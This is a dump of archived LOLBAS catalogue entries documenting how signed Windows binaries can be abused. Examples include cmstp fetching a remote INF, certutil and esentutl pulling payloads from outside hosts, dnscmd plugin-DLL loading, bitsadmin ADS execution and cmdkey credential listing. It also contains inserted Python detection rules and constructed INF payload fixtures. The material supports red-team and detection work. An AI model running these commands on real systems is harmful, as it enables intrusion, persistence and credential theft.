ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe Full_Path: - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994213164484001793 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml ================================================ --- Name: RunCmd_X64.exe Description: A tool to execute a command file Author: Bart Created: 2019-03-17 Commands: - Command: RunCmd_X64 file.cmd /F Description: Launch command file and hide the console window Usecase: Run applications and scripts using Acer's RunCmd Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\OEM\Preload\utility Code_Sample: - Code: Detection: - IOC: RunCmd_X64.exe spawned Resources: - Link: 
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html - Link: https://twitter.com/bartblaze/status/1107390776147881984 Acknowledgement: - Person: Bart Handle: '@bartblaze' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml ================================================ --- Name: Setup.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Run Setup.exe Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. Full_Path: - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315 Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994381620588236800 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml ================================================ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. Author: 'Jesus Galvez' Created: '2020-11-01' Commands: - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. 
Usecase: Execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Whatsapp installed Full_Path: - Path: '%localappdata%\Whatsapp\Update.exe' Detection: - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml ================================================ --- Name: Usbinst.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Description: Execute calc.exe through DefaultInstall Section Directive in INF file. Full_Path: - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993514357807108096 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml ================================================ --- Name: VBoxDrvInst.exe Description: Persistence Author: '' Created: 2018-05-25 Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe Full_Path: - C:\Program Files\Oracle\VirtualBox Guest Additions Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993497996179492864 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml ================================================ Name: aswrundll.exe Description: This process is used by AVAST antivirus to run and execute any modules Author: Eli Salem Created: '2019-03-19' Commands: - Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"' 
    Description: Load and execute an arbitrary module (DLL) using aswrundll
    Usecase: Execute malicious modules using aswrundll.exe
    Category: Execute
    Privileges: Any
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
  - Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
Code_Sample:
  - Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
Resources:
  - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement:
  - Person: Eli Salem
    Handle: 'https://www.linkedin.com/in/eli-salem-954728150'
================================================
FILE: Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
================================================
---
Name: winword.exe
Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: winword.exe /l dllfile.dll
    Description: Launch a DLL payload.
    Usecase: Execute a locally stored DLL using winword.exe.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Code_Sample:
  - Code:
Detection:
  - IOC:
Resources:
  - Link: https://twitter.com/vysecurity/status/884755482707210241
  - Link: https://twitter.com/Hexacorn/status/885258886428725250
Acknowledgement:
  - Person: Vincent Yiu (cmd)
    Handle: '@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'
================================================
FILE: Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml
================================================
---
Name: testxlst.js
Description: Script included with Pywin32.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test JScript included with the Python tool; performs an XSL transform, which can be used for payload execution.
    Category: Execution
    Privileges: User
    MitreID: T1064
    OperatingSystem: Windows
  - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test JScript included with the Python tool; performs an XSL transform, which can be used for payload execution.
    Category: Execution
    Privileges: User
    MitreID: T1064
    OperatingSystem: Windows
Full_Path:
  - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/bohops/status/993314069116485632
  - https://github.com/mhammond/pywin32
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
================================================
FILE: Archive-Old-Version/OSBinaries/Atbroker.exe.md
================================================
## Atbroker.exe
* Functions: Execute
```
ATBroker.exe /start malware
Start a registered Assistive Technology (AT).
```
* Resources:
  * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
* Full path:
  * C:\Windows\System32\Atbroker.exe
  * C:\Windows\SysWOW64\Atbroker.exe
* Notes:
  Thanks to Adam - @hexacorn
  Modifications must be made to the system registry to either register a new, or modify an existing, Assistive Technology (AT) entry before ATBroker will start it.
================================================
FILE: Archive-Old-Version/OSBinaries/Bash.exe.md
================================================
## Bash.exe
* Functions: Execute
```
bash.exe -c calc.exe
Execute calc.exe.
```
* Resources:
  *
* Full path:
  * ?
* Notes:
  Thanks to ?
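Several of the entries above (the Whatsapp `Update.exe` IOC, the Usbinst and VBoxDrvInst INF installs, aswrundll module loading, `winword.exe /l`, the pywin32 `testxlst.js` script and `ATBroker /start`) ship with an empty `Detection:` list. The following is an added example, not code from the LOLBAS project, showing how those documented command lines can be turned into process-creation detections. It runs over constructed events (not real telemetry); the allowlists `AVAST_DIR`, `BUILTIN_AT` and `SQUIRREL_CHILDREN` are assumptions that must be tuned per environment.

```python
"""Process-creation detections for the LOLBin entries above; events are constructed, not real telemetry."""
import re
from typing import Dict, List, Optional

Event = Dict[str, str]  # parent_image, image, command_line

# Assumed allowlists (tune per environment).
AVAST_DIR = "c:\\program files\\avast software\\"
BUILTIN_AT = {"narrator", "magnifierpane", "osk"}        # assumption: built-in AT registrations
SQUIRREL_CHILDREN = {"whatsapp.exe", "update.exe"}         # expected children of Whatsapp\Update.exe


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()          # lower-cased file name


def _args(cmd: str) -> List[str]:
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]  # honours double-quoted tokens


def rule_winword_dll(ev: Event) -> Optional[str]:
    """winword.exe /l <file>.dll loads an arbitrary DLL into Word."""
    if _base(ev["image"]) == "winword.exe" and re.search(r'\s/l\s+"?[^\s"]+\.dll', ev["command_line"], re.I):
        return "winword.exe /l used to load a DLL"
    return None


def rule_aswrundll(ev: Event) -> Optional[str]:
    """aswrundll should only load modules from the Avast install directory."""
    if _base(ev["image"]) in ("aswrundll", "aswrundll.exe"):
        for arg in _args(ev["command_line"])[1:]:
            if arg.lower().endswith(".dll") and not arg.lower().startswith(AVAST_DIR):
                return f"aswrundll loading module outside Avast directory: {arg}"
    return None


def rule_inf_install(ev: Event) -> Optional[str]:
    """Usbinst InstallHinfSection / VBoxDrvInst executeinf process a user-supplied INF."""
    name, cmd = _base(ev["image"]), ev["command_line"].lower()
    if name == "usbinst.exe" and "installhinfsection" in cmd:
        return "Usbinst.exe InstallHinfSection with a user-supplied INF"
    if name == "vboxdrvinst.exe" and "executeinf" in cmd:
        return "VBoxDrvInst.exe executeinf with a user-supplied INF"
    return None


def rule_pywin32_xslt(ev: Event) -> Optional[str]:
    """cscript/wscript running the pywin32 XSLT test script (both spellings used on the page)."""
    if _base(ev["image"]) in ("cscript.exe", "wscript.exe") and re.search(r"testx(sl|ls)t\.js", ev["command_line"], re.I):
        return "pywin32 test script used for an XSL transform"
    return None


def rule_atbroker(ev: Event) -> Optional[str]:
    """ATBroker.exe /start <name> launches whatever AT is registered under <name>."""
    args = _args(ev["command_line"])
    if _base(ev["image"]) == "atbroker.exe" and len(args) >= 3 and args[1].lower() == "/start" \
            and args[2].lower() not in BUILTIN_AT:
        return f"ATBroker starting non-built-in AT '{args[2]}'"
    return None


def rule_squirrel_child(ev: Event) -> Optional[str]:
    """IOC from the Whatsapp entry: Update.exe spawning an unknown process."""
    if ev.get("parent_image", "").lower().endswith("\\whatsapp\\update.exe") \
            and _base(ev["image"]) not in SQUIRREL_CHILDREN:
        return f"Whatsapp Update.exe spawned unexpected child {_base(ev['image'])}"
    return None


RULES = [rule_winword_dll, rule_aswrundll, rule_inf_install, rule_pywin32_xslt, rule_atbroker, rule_squirrel_child]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Run every rule over every event; one hit per (event, rule) match."""
    hits: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append({"event": idx, "rule": rule.__name__, "detail": detail})
    return hits


def _ev(parent: str, image: str, cmd: str) -> Event:
    return {"parent_image": parent, "image": image, "command_line": cmd}


WORD = r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
ASW = r"C:\Program Files\Avast Software\Avast\aswrundll"
# Constructed sample events mirroring the documented commands (first six malicious, last three benign).
SAMPLE_EVENTS: List[Event] = [
    _ev(r"C:\Windows\explorer.exe", WORD, f'"{WORD}" /l C:\\Users\\Public\\dllfile.dll'),
    _ev(r"C:\Windows\System32\cmd.exe", ASW, f'"{ASW}" "C:\\Users\\Public\\Libraries\\tempsys\\module.dll"'),
    _ev(r"C:\Windows\System32\cmd.exe", r"C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe",
        r'Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"'),
    _ev(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cscript.exe",
        r"cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out"),
    _ev(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ATBroker.exe", "ATBroker.exe /start malware"),
    _ev(r"C:\Users\alice\AppData\Local\Whatsapp\Update.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    _ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\ATBroker.exe", "ATBroker.exe /start narrator"),
    _ev(r"C:\Program Files\Avast Software\Avast\AvastSvc.exe", ASW,
        f'"{ASW}" "C:\\Program Files\\Avast Software\\Avast\\defs\\module.dll"'),
    _ev(r"C:\Windows\explorer.exe", WORD, f'"{WORD}" /n C:\\Users\\alice\\report.docx'),
]
```

`detect(SAMPLE_EVENTS)` fires exactly once on each of the six malicious events and stays silent on the three benign look-alikes; the `rule_atbroker` and `rule_aswrundll` allowlists are the knobs that decide noise versus coverage, so review them against the ATs and Avast modules actually present in your fleet before deploying.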
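Usbinst `InstallHinfSection` and VBoxDrvInst `executeinf` (above) both hand an attacker-controlled INF to the setup engine, and the same directives drive the archive's `Cmstp.inf` and `Infdefaultinstall.inf` payloads. The following added example (not part of the LOLBAS project) is a small static triage that parses an INF and flags install-section directives that execute code (`RunPreSetupCommands`/`RunPostSetupCommands`, `RegisterOCXs`/`UnRegisterOCXs`, `RegisterDlls`/`UnregisterDlls`) or persist via `AddReg` into autostart keys. The sample INFs are constructed to mirror the payload layout; `example.invalid` and the file names in them are placeholders.

```python
"""Static triage of INF files handed to Usbinst InstallHinfSection / VBoxDrvInst executeinf (added example)."""
import re
from typing import Dict, List, Optional, Tuple

Section = List[Tuple[str, str]]  # (key, value); key == "" for keyless lines such as "%11%\scrobj.dll,NI,https://..."

# Install-section directives that cause code execution (advpack / setupapi semantics).
EXEC_DIRECTIVES = {
    "runpresetupcommands": "runs listed commands before install",
    "runpostsetupcommands": "runs listed commands after install",
    "registerocxs": "calls DllRegisterServer on listed modules",
    "unregisterocxs": "calls DllUnregisterServer on listed modules",
    "registerdlls": "calls DllRegisterServer on listed modules",
    "unregisterdlls": "calls DllUnregisterServer on listed modules",
}
SCRIPT_HOST_RE = re.compile(r"scrobj\.dll|mshta|wscript|cscript|powershell|cmd\.exe|rundll32", re.I)
REMOTE_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)
AUTOSTART_RE = re.compile(r"\\(run|runonce|runservices|winlogon|services)\b", re.I)


def parse_inf(text: str) -> Dict[str, Section]:
    """Parse INF text into {section_name_lower: [(key, value), ...]}; ';' comments are stripped."""
    sections: Dict[str, Section] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(.+?)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        key, sep, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()) if sep else ("", line))
    return sections


def triage_inf(text: str, install_section: Optional[str] = None) -> List[dict]:
    """Flag execution/persistence directives reachable from the install section(s).

    install_section mirrors the name passed on the command line ("DefaultInstall 128 c:\\temp\\calc.inf");
    by default every DefaultInstall* section is examined.
    """
    sections = parse_inf(text)
    roots = [install_section.lower()] if install_section else [s for s in sections if s.startswith("defaultinstall")]
    findings: List[dict] = []
    for root in roots:
        for directive, value in sections.get(root, []):
            if directive not in EXEC_DIRECTIVES and directive != "addreg":
                continue
            for target in (t.strip().lower() for t in value.split(",") if t.strip()):
                for key, val in sections.get(target, []):
                    entry = f"{key}={val}" if key else val
                    reasons = []
                    if directive in EXEC_DIRECTIVES:
                        reasons.append(EXEC_DIRECTIVES[directive])
                    if SCRIPT_HOST_RE.search(entry):
                        reasons.append("script host or scriptlet loader")
                    if REMOTE_RE.search(entry):
                        reasons.append("remote URL/UNC source")
                    if directive == "addreg" and AUTOSTART_RE.search(entry):
                        reasons.append("autostart registry location")
                    if not reasons:
                        continue  # e.g. AddReg writing an ordinary vendor key
                    severity = "high" if len(reasons) > 1 or directive == "addreg" else "medium"
                    findings.append({"install_section": root, "directive": directive, "target_section": target,
                                     "entry": entry, "severity": severity, "reasons": reasons})
    return findings


# Constructed samples in the same shape as the archive's Cmstp.inf / Infdefaultinstall.inf payloads.
SCROBJ_INF = """\
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\\scrobj.dll,NI,https://example.invalid/payload.sct
"""

RUNKEY_INF = """\
[Version]
Signature=$CHICAGO$

[DefaultInstall]
AddReg=Persist

[Persist]
HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Run,Updater,,"C:\\Users\\Public\\evil.exe"
"""

BENIGN_INF = """\
[Version]
Signature=$CHICAGO$

[DefaultInstall]
CopyFiles=Files
AddReg=Reg

[Files]
vendor.dll

[Reg]
HKLM,Software\\Vendor\\App,Version,,"1.0"
"""
```

`triage_inf(SCROBJ_INF)` returns one high-severity finding (an `UnRegisterOCXs` entry that loads `scrobj.dll` from a remote scriptlet), `triage_inf(RUNKEY_INF)` one high-severity `AddReg` finding for the Run key, and `triage_inf(BENIGN_INF)` nothing. Passing the section name from the command line (`triage_inf(SCROBJ_INF, "DefaultInstall")`) returns nothing for this payload because its directives live under `DefaultInstall_SingleUser`, which is exactly why the section name an attacker chooses should be read from the process command line, not assumed.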
================================================
FILE: Archive-Old-Version/OSBinaries/Bitsadmin.exe.md
================================================
## Bitsadmin.exe
* Functions: Execute, Download, Copy, Read ADS
```
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command (here cmd.exe stored in an Alternate Data Stream of 1.txt) when the transfer completes, then resume and complete the job.

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add a remote download (autoruns.exe from live.sysinternals.com) to the job, then resume and complete the job to write the file to disk.

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
One-liner version that creates a bitsadmin job named 1, adds cmd.exe to the job, resumes and completes the job (copying cmd.exe to c:\data\playfolder), then resets the job list.

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
One-liner version that creates a bitsadmin job named 1, adds cmd.exe to the job, configures the job to run the target command (cmd.exe from the ADS) when the transfer completes, then resumes the job and resets the job list.
```
* Resources:
  * https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
  * https://www.youtube.com/watch?v=_8xJaaQlpBo
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
  * c:\Windows\System32\bitsadmin.exe
  * c:\Windows\SysWOW64\bitsadmin.exe
* Notes:
  Thanks to Rob Fuller - @mubix, Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Certutil.exe.md
================================================
## Certutil.exe
* Functions: Download, Add ADS, Decode, Encode
```
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Download and save a PS1 file to an Alternate Data Stream (ADS).

certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Commands to encode and decode a file using Base64.
```
* Resources:
  * https://twitter.com/Moriarty_Meng/status/984380793383370752
  * https://twitter.com/mattifestation/status/620107926288515072
* Full path:
  * c:\windows\system32\certutil.exe
  * c:\windows\sysWOW64\certutil.exe
* Notes:
  Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
================================================
FILE: Archive-Old-Version/OSBinaries/Cmdkey.exe.md
================================================
## Cmdkey.exe
* Functions: Credentials
```
cmdkey /list
List cached credentials.
```
* Resources:
  * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
* Full path:
  * c:\windows\system32\cmdkey.exe
  * c:\windows\sysWOW64\cmdkey.exe
* Notes:
================================================
FILE: Archive-Old-Version/OSBinaries/Cmstp.exe.md
================================================
## Cmstp.exe
* Functions: Execute, UACBypass
```
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
* Resources:
  * https://twitter.com/NickTyrer/status/958450014111633408
  * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
  * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
  * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
  * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
  * https://github.com/hfiref0x/UACME
* Full path:
  * C:\Windows\system32\cmstp.exe
  * C:\Windows\sysWOW64\cmstp.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
================================================
FILE: Archive-Old-Version/OSBinaries/Control.exe.md
================================================
## Control.exe
* Functions: Execute, Read ADS
```
control.exe c:\windows\tasks\file.txt:evil.dll
Execute evil.dll which is stored in an Alternate Data Stream (ADS).
```
* Resources:
  * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
  * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
  * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
  * https://twitter.com/bohops/status/955659561008017409
* Full path:
  * C:\Windows\system32\control.exe
  * C:\Windows\sysWOW64\control.exe
* Notes:
  Thanks to Jimmy - @bohops
================================================
FILE: Archive-Old-Version/OSBinaries/Csc.exe.md
================================================
## Csc.exe
* Functions: Compile
```
csc -out:My.exe File.cs
Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.

csc -target:library File.cs
Use CSC.EXE to compile the C# code in File.cs into a DLL (File.dll) instead of an executable.
```
* Resources:
  * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
  *
* Full path:
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
* Notes:
  Thanks to ?
================================================
FILE: Archive-Old-Version/OSBinaries/Cscript.exe.md
================================================
## Cscript.exe
* Functions: Execute, Read ADS
```
cscript c:\ads\file.txt:script.vbs
Use cscript.exe to execute a Visual Basic script stored in an Alternate Data Stream (ADS).
```
* Resources:
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
  * c:\windows\system32\cscript.exe
  * c:\windows\sysWOW64\cscript.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Dfsvc.exe.md
================================================
## Dfsvc.exe
* Functions: Execute
```
Missing Example
```
* Resources:
  * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* Full path:
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
* Notes:
  Thanks to Casey Smith - @subtee
================================================
FILE: Archive-Old-Version/OSBinaries/Diskshadow.exe.md
================================================
## Diskshadow.exe
* Functions: Execute, Dump NTDS.dit
```
diskshadow.exe /s c:\test\diskshadow.txt
Execute commands using diskshadow.exe from a prepared diskshadow script.

diskshadow> exec calc.exe
Execute calc.exe from the interactive diskshadow.exe prompt.
```
* Resources:
  * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
* Full path:
  * c:\windows\system32\diskshadow.exe
  * c:\windows\sysWOW64\diskshadow.exe
* Notes:
  Thanks to Jimmy - @bohops
================================================
FILE: Archive-Old-Version/OSBinaries/Dnscmd.exe.md
================================================
## Dnscmd.exe
* Functions: Execute
```
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Adds a specially crafted DLL as a plug-in of the DNS Service.
```
* Resources:
  * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
  * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
  * https://twitter.com/Hexacorn/status/994000792628719618
  * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
* Full path:
  * c:\windows\system32\Dnscmd.exe
  * c:\windows\sysWOW64\Dnscmd.exe
* Notes:
  This command must be run against a DNS server (typically a DC) by a user that is at least a member of the DnsAdmins group; the DNS service has to be restarted before the plug-in DLL is loaded. See the reference links for DLL details.
  Thanks to Shay Ber - ?, Dimitrios Slamaris - @dim0x69, Nikhil SamratAshok Mittal - @nikhil_mitt
================================================
FILE: Archive-Old-Version/OSBinaries/Esentutl.exe.md
================================================
## Esentutl.exe
* Functions: Copy, Download, Write ADS, Read ADS
```
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Copies the source VBS file to the destination VBS file.

esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Copies the source Alternate Data Stream (ADS) to the destination EXE.

esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE from a WebDAV share to an Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Copies the source EXE from a WebDAV share to the destination EXE file.
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Copies the source EXE from one WebDAV share to a destination on another WebDAV share.
```
* Resources:
  * https://twitter.com/egre55/status/985994639202283520
* Full path:
  * c:\windows\system32\esentutl.exe
  * c:\windows\sysWOW64\esentutl.exe
* Notes:
  Thanks to egre55 - @egre55
================================================
FILE: Archive-Old-Version/OSBinaries/Expand.exe.md
================================================
## Expand.exe
* Functions: Download, Copy, Add ADS
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
Copies the source file from a WebDAV share to the destination.

expand c:\ADS\file1.bat c:\ADS\file2.bat
Copies the source file to the destination.

expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Copies the source file from a WebDAV share to an Alternate Data Stream (ADS) of the destination file.
```
* Resources:
  * https://twitter.com/infosecn1nja/status/986628482858807297
  * https://twitter.com/Oddvarmoe/status/986709068759949319
* Full path:
  * c:\windows\system32\Expand.exe
  * c:\windows\sysWOW64\Expand.exe
* Notes:
  Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Explorer.exe.md
================================================
## Explorer.exe
* Functions: Execute
```
explorer.exe calc.exe
Executes calc.exe as a subprocess of explorer.exe.
```
* Resources:
  * https://twitter.com/bohops/status/986984122563391488
* Full path:
  * c:\windows\explorer.exe
  * c:\windows\sysWOW64\explorer.exe
* Notes:
  Thanks to Jimmy - @bohops
================================================
FILE: Archive-Old-Version/OSBinaries/Extexport.exe.md
================================================
## Extexport.exe
* Functions: Execute
```
Extexport.exe c:\test foo bar
Load a DLL located in the c:\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.
```
* Resources:
  * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
* Full path:
  * C:\Program Files\Internet Explorer\Extexport.exe
  * C:\Program Files (x86)\Internet Explorer\Extexport.exe
* Notes:
  Thanks to Adam - @hexacorn
================================================
FILE: Archive-Old-Version/OSBinaries/Extrac32.exe.md
================================================
## Extrac32.exe
* Functions: Add ADS, Download
```
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Extracts the source CAB file from a WebDAV share into an Alternate Data Stream (ADS) of the target file.

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy the source file from a WebDAV share to the destination file, overwriting it if present.
```
* Resources:
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://twitter.com/egre55/status/985994639202283520
* Full path:
  * c:\windows\system32\extrac32.exe
  * c:\windows\sysWOW64\extrac32.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55
================================================
FILE: Archive-Old-Version/OSBinaries/Findstr.exe.md
================================================
## Findstr.exe
* Functions: Add ADS, Search
```
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
